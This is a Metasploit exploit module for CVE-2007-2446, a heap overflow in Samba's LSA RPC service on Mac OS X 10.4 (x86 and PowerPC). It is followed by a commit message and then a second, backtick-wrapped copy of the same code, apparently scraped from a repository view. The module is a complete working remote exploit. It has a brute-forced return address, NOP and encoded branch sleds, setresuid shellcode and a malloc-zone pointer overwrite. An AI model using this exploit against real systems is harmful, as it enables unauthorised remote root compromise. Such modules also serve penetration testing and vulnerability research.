metasploit-framework/modules/exploits/osx/samba/lsa_transnames_heap.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote

	include Exploit::Remote::DCERPC
	include Exploit::Remote::SMB
	include Exploit::Brute
	
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Samba lsa_io_trans_names Heap Overflow',
			'Description'    => %q{
				This module triggers a heap overflow in the LSA RPC service
			of the Samba daemon. This module uses the szone_free() to overwrite
			the size() pointer in initial_malloc_zones structure.
			},
			'Author'         =>
				[
					'Ramon de Carvalho Valle <ramon@risesecurity.org>',
					'Adriano Lima <adriano@risesecurity.org>',
					'hdm'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2007-2446'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
				},
			'Platform'       => 'osx',
			'Targets'        => 
				[
					['Mac OS X 10.4.x x86 Samba 3.0.10',
					{
						'Platform'      => 'osx', 
						'Arch'          => [ ARCH_X86 ],
						'Nops'          => 4 * 1024,
						'Bruteforce' => 
							{
								'Start' => { 'Ret' => 0x0181c000 },
								'Stop'  => { 'Ret' => 0x01820000 },
								'Step'  => 256,
							},
						'Payload'  => 
							{
								# setresuid(0, 0, 0)
								'Prepend' => "\x31\xc0\x50\x50\x50\x50\x66\xb8\x37\x01\xcd\x80",							
							}
					}
					],

					['Mac OS X 10.4.x PPC Samba 3.0.10',
					{
						'Platform'      => 'osx', 
						'Arch'          => [ ARCH_PPC ],
						'Nops'          => 1600,
						'Bruteforce' => 
							{
								'Start' => { 'Ret' => 0x0181c000 },
								'Stop'  => { 'Ret' => 0x01830000 },
								'Step'  => 796,
							}
					}
					],
					
					['DEBUG',
					{
						'Platform'      => 'osx', 
						'Arch'          => [ ARCH_X86 ],
						'Nops'          => 4 * 1024,
						'Bruteforce' => 
							{
								'Start' => { 'Ret' => 0xaabbccdd },
								'Stop'  => { 'Ret' => 0xaabbccdd },
								'Step'  => 0,
							}
					}
					],	
				],
			'DisclosureDate' => 'May 14 2007'
			))
			
		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use", 'LSARPC']),
			], self.class)
						
	end

	# Handle a strange byteswapping issue on PPC
	def ppc_byteswap(addr)
		data = [addr].pack('N')
		(data[1,1] + data[0,1] + data[3,1] + data[2,1]).unpack('N')[0]
	end	
	
	def brute_exploit(target_addrs)
		
		# Create the real nop sled
		if(not @nops)
			if (target['Nops'] > 0)
				print_status("Creating nop sled....")
				@nops = make_nops(target['Nops'])
			else
				@nops = ''
			end
		end

		print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['Ret'])
		
		pipe = datastore['SMBPIPE'].downcase
				
		print_status("Connecting to the SMB service...")
		connect()
		smb_login()

		datastore['DCERPC::fake_bind_multi'] = false

		handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		num_entries  = 256
		num_entries2 = 257

		# first talloc_chunk
		# 16 bits align
		# 16 bits sid_name_use
		#     16 bits uni_str_len
		#     16 bits uni_max_len
		#     32 bits buffer
		# 32 bits domain_idx
		buf = (('A' * 16) * num_entries)

		# padding
		buf << 'A' * 4

		#
		# Use the szone_free() to overwrite the size() pointer in
		# initial_malloc_zones structure.
		#

		size_pointer = 0x1800008
		
		# Initial nops array
		nops = ''
		
		# x86
		if (target.arch.include?(ARCH_X86))

			#
			# 0x357b ^ ( 0x1800004 ^ 0x42424242 ) = 0x43c2773d
			#
			# 0:   3d 77 c2 43 42          cmpl   $0x4243c277,%eax
			#

			#
			# 0:   3d 77 c2 43 42          cmpl   $0x4243c277,%eax
			# 5:   42                      incl   %edx
			# 6:   42                      incl   %edx
			# 7:   42                      incl   %edx
			# 8:   04 00                   addb   $0x0,%al
			# a:   80 01 42                addb   $0x42,(%ecx)
			#

			# Nop block
			nops = "\x42" * (@nops.length)

			# Pointers
			buf << [target_addrs['Ret']].pack('V')
			buf << [size_pointer - 4].pack('V')

			# padding
			buf << "A" * (256 - 12)

		# PPC
		else
			
			#
			#  The first half of the nop sled is an XOR encoded branch 
			#  instruction. The second half is a series of unencoded nop
			#  instructions. The result is:
			#
			#  > This is the decoded branch instruction
			#  0x181c380:      bl      0x181c6a0
			#
			#  > The size pointer is written below this
			#  0x181c384:      .long 0x1800004
			#
			#  > Followed by the encoded branch sled
			#  0x181c388:      ba      0x180365c
			#  [ ... ]
			#  
			#  > The branch lands in the normal nop sled
			#  0x181c6a0:      andi.   r17,r16,58162
			#  [ ... ]
			#  
			#  > Finally we reach our payload :-)
			#

			size_pointer = size_pointer - 4

			sled = target['Nops']	
			jump = [ 0x357b ^ ( size_pointer ^ (0x48000001 + sled / 2 )) ].pack('N')
			nops = (jump * (sled / 8)) + @nops[0, sled / 8]

			addr_size = ppc_byteswap(size_pointer)
			addr_ret  = ppc_byteswap(target_addrs['Ret'])
			
			# This oddness is required for PPC
			buf << [addr_size].pack('N') 
			buf << [addr_ret ].pack('N')[2,2]
			buf << [addr_ret ].pack('N')

			# padding
			buf << "A" * (256 - 10)		
		end


		stub = lsa_open_policy(dcerpc)
		
		stub << NDR.long(0)            # num_entries
		stub << NDR.long(0)            # ptr_sid_enum
		stub << NDR.long(num_entries)  # num_entries
		stub << NDR.long(0x20004)      # ptr_trans_names
		stub << NDR.long(num_entries2) # num_entries2
		stub << buf
		stub << nops
		stub << payload.encoded
		
		print_status("Calling the vulnerable function...")

		begin
			# LsarLookupSids
			dcerpc.call(0x0f, stub)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply
			print_good('Server did not respond, this is expected')
		rescue Rex::Proto::DCERPC::Exceptions::Fault
			print_error('Server is most likely patched...')
		rescue => e
			if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
				print_good('Server disconnected, this is expected')
			else
				print_error("Error: #{e.class}: #{e.to_s}")
			end
		end

		handler
		disconnect	
	end

	def lsa_open_policy(dcerpc, server="\\")

		stubdata =
			# Server
			NDR.uwstring(server) +
			# Object Attributes
				NDR.long(24) + # SIZE
				NDR.long(0)  + # LSPTR
				NDR.long(0)  + # NAME
				NDR.long(0)  + # ATTRS
				NDR.long(0)  + # SEC DES
					# LSA QOS PTR
					NDR.long(1)  + # Referent
					NDR.long(12) + # Length
					NDR.long(2)  + # Impersonation
					NDR.long(1)  + # Context Tracking
					NDR.long(0)  + # Effective Only
			# Access Mask
			NDR.long(0x02000000)
			
		res = dcerpc.call(6, stubdata)
		
		dcerpc.last_response.stub_data[0,20]
	end

end	
end
Added new Samba lsa_io_trans_names heap overflow exploit module for Mac OS X x86 and PowerPC git-svn-id: file:///home/svn/framework3/trunk@5030 4d416f70-5f16-0410-b530-b9f4589650da 2007-07-05 01:41:39 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/projects/Framework/`
			`##`


			`require 'msf/core'`

			`module Msf`

			`class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote`

			`include Exploit::Remote::DCERPC`
			`include Exploit::Remote::SMB`
			`include Exploit::Brute`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Samba lsa_io_trans_names Heap Overflow',`
			`'Description' => %q{`
			`This module triggers a heap overflow in the LSA RPC service`
			`of the Samba daemon. This module uses the szone_free() to overwrite`
			`the size() pointer in initial_malloc_zones structure.`
			`},`
			`'Author' =>`
			`[`
			`'Ramon de Carvalho Valle <ramon@risesecurity.org>',`
			`'Adriano Lima <adriano@risesecurity.org>',`
			`'hdm'`
			`],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`['CVE', '2007-2446'],`
			`],`
			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`'Space' => 1024,`
			`},`
			`'Platform' => 'osx',`
			`'Targets' =>`
			`[`
			`['Mac OS X 10.4.x x86 Samba 3.0.10',`
			`{`
			`'Platform' => 'osx',`
			`'Arch' => [ ARCH_X86 ],`
			`'Nops' => 4 * 1024,`
			`'Bruteforce' =>`
			`{`
			`'Start' => { 'Ret' => 0x0181c000 },`
			`'Stop' => { 'Ret' => 0x01820000 },`
			`'Step' => 256,`
			`},`
			`'Payload' =>`
			`{`
			`# setresuid(0, 0, 0)`
			`'Prepend' => "\x31\xc0\x50\x50\x50\x50\x66\xb8\x37\x01\xcd\x80",`
			`}`
			`}`
			`],`

			`['Mac OS X 10.4.x PPC Samba 3.0.10',`
			`{`
			`'Platform' => 'osx',`
			`'Arch' => [ ARCH_PPC ],`
			`'Nops' => 1600,`
			`'Bruteforce' =>`
			`{`
			`'Start' => { 'Ret' => 0x0181c000 },`
			`'Stop' => { 'Ret' => 0x01830000 },`
			`'Step' => 796,`
			`}`
			`}`
			`],`

			`['DEBUG',`
			`{`
			`'Platform' => 'osx',`
			`'Arch' => [ ARCH_X86 ],`
			`'Nops' => 4 * 1024,`
			`'Bruteforce' =>`
			`{`
			`'Start' => { 'Ret' => 0xaabbccdd },`
			`'Stop' => { 'Ret' => 0xaabbccdd },`
			`'Step' => 0,`
			`}`
			`}`
			`],`
			`],`
			`'DisclosureDate' => 'May 14 2007'`
			`))`

			`register_options(`
			`[`
			`OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']),`
			`], self.class)`

			`end`

			`# Handle a strange byteswapping issue on PPC`
			`def ppc_byteswap(addr)`
			`data = [addr].pack('N')`
			`(data[1,1] + data[0,1] + data[3,1] + data[2,1]).unpack('N')[0]`
			`end`

			`def brute_exploit(target_addrs)`

			`# Create the real nop sled`
			`if(not @nops)`
			`if (target['Nops'] > 0)`
			`print_status("Creating nop sled....")`
			`@nops = make_nops(target['Nops'])`
			`else`
			`@nops = ''`
			`end`
			`end`

			`print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['Ret'])`

			`pipe = datastore['SMBPIPE'].downcase`

			`print_status("Connecting to the SMB service...")`
			`connect()`
			`smb_login()`

			`datastore['DCERPC::fake_bind_multi'] = false`

			`handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])`
			`print_status("Binding to #{handle} ...")`
			`dcerpc_bind(handle)`
			`print_status("Bound to #{handle} ...")`

			`num_entries = 256`
			`num_entries2 = 257`

			`# first talloc_chunk`
			`# 16 bits align`
			`# 16 bits sid_name_use`
			`# 16 bits uni_str_len`
			`# 16 bits uni_max_len`
			`# 32 bits buffer`
			`# 32 bits domain_idx`
			`buf = (('A' * 16) * num_entries)`

			`# padding`
			`buf << 'A' * 4`

			`#`
			`# Use the szone_free() to overwrite the size() pointer in`
			`# initial_malloc_zones structure.`
			`#`

			`size_pointer = 0x1800008`

			`# Initial nops array`
			`nops = ''`

			`# x86`
			`if (target.arch.include?(ARCH_X86))`

			`#`
			`# 0x357b ^ ( 0x1800004 ^ 0x42424242 ) = 0x43c2773d`
			`#`
			`# 0: 3d 77 c2 43 42 cmpl $0x4243c277,%eax`
			`#`

			`#`
			`# 0: 3d 77 c2 43 42 cmpl $0x4243c277,%eax`
			`# 5: 42 incl %edx`
			`# 6: 42 incl %edx`
			`# 7: 42 incl %edx`
			`# 8: 04 00 addb $0x0,%al`
			`# a: 80 01 42 addb $0x42,(%ecx)`
			`#`

			`# Nop block`
			`nops = "\x42" * (@nops.length)`

			`# Pointers`
			`buf << [target_addrs['Ret']].pack('V')`
			`buf << [size_pointer - 4].pack('V')`

			`# padding`
			`buf << "A" * (256 - 12)`

			`# PPC`
			`else`

			`#`
			`# The first half of the nop sled is an XOR encoded branch`
			`# instruction. The second half is a series of unencoded nop`
			`# instructions. The result is:`
			`#`
			`# > This is the decoded branch instruction`
			`# 0x181c380: bl 0x181c6a0`
			`#`
			`# > The size pointer is written below this`
			`# 0x181c384: .long 0x1800004`
			`#`
			`# > Followed by the encoded branch sled`
			`# 0x181c388: ba 0x180365c`
			`# [ ... ]`
			`#`
			`# > The branch lands in the normal nop sled`
			`# 0x181c6a0: andi. r17,r16,58162`
			`# [ ... ]`
			`#`
			`# > Finally we reach our payload :-)`
			`#`

			`size_pointer = size_pointer - 4`

			`sled = target['Nops']`
			`jump = [ 0x357b ^ ( size_pointer ^ (0x48000001 + sled / 2 )) ].pack('N')`
			`nops = (jump * (sled / 8)) + @nops[0, sled / 8]`

			`addr_size = ppc_byteswap(size_pointer)`
			`addr_ret = ppc_byteswap(target_addrs['Ret'])`

			`# This oddness is required for PPC`
			`buf << [addr_size].pack('N')`
			`buf << [addr_ret ].pack('N')[2,2]`
			`buf << [addr_ret ].pack('N')`

			`# padding`
			`buf << "A" * (256 - 10)`
			`end`



			`stub = lsa_open_policy(dcerpc)`

			`stub << NDR.long(0) # num_entries`
			`stub << NDR.long(0) # ptr_sid_enum`
			`stub << NDR.long(num_entries) # num_entries`
			`stub << NDR.long(0x20004) # ptr_trans_names`
			`stub << NDR.long(num_entries2) # num_entries2`
			`stub << buf`
			`stub << nops`
			`stub << payload.encoded`

			`print_status("Calling the vulnerable function...")`

			`begin`
			`# LsarLookupSids`
			`dcerpc.call(0x0f, stub)`
			`rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply`
			`print_good('Server did not respond, this is expected')`
			`rescue Rex::Proto::DCERPC::Exceptions::Fault`
			`print_error('Server is most likely patched...')`
			`rescue => e`
			`if e.to_s =~ /STATUS_PIPE_DISCONNECTED/`
			`print_good('Server disconnected, this is expected')`
			`else`
			`print_error("Error: #{e.class}: #{e.to_s}")`
			`end`
			`end`

			`handler`
			`disconnect`
			`end`

			`def lsa_open_policy(dcerpc, server="\\")`

			`stubdata =`
			`# Server`
			`NDR.uwstring(server) +`
			`# Object Attributes`
			`NDR.long(24) + # SIZE`
			`NDR.long(0) + # LSPTR`
			`NDR.long(0) + # NAME`
			`NDR.long(0) + # ATTRS`
			`NDR.long(0) + # SEC DES`
			`# LSA QOS PTR`
			`NDR.long(1) + # Referent`
			`NDR.long(12) + # Length`
			`NDR.long(2) + # Impersonation`
			`NDR.long(1) + # Context Tracking`
			`NDR.long(0) + # Effective Only`
			`# Access Mask`
			`NDR.long(0x02000000)`

			`res = dcerpc.call(6, stubdata)`

			`dcerpc.last_response.stub_data[0,20]`
			`end`

			`end`
			`end`